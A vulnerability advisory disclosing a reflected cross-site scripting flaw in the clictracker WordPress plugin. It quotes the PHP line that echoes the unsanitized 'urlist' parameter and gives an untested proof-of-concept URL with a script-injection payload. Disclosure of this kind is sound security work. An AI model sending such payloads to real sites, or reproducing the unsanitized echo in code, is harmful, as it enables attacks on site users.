Advisory #: 505
Title: Reflected XSS in wordpress plugin clictracker v1.0.5
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/clictracker
Downloads: 423
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: clictracker
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./clictracker/include/page-load-ajax.php: 262: <a href="javascript:void(0)" onclick="deleteme(this)" name="<?php echo $_GET['urlist']?>" id="<?php echo $rest->id?>">Delete</a></div> The variable urlist appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./clictracker/include/page-load-ajax.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/clictracker/include/page-load-ajax.php?urlist="><script>alert(1);</script><"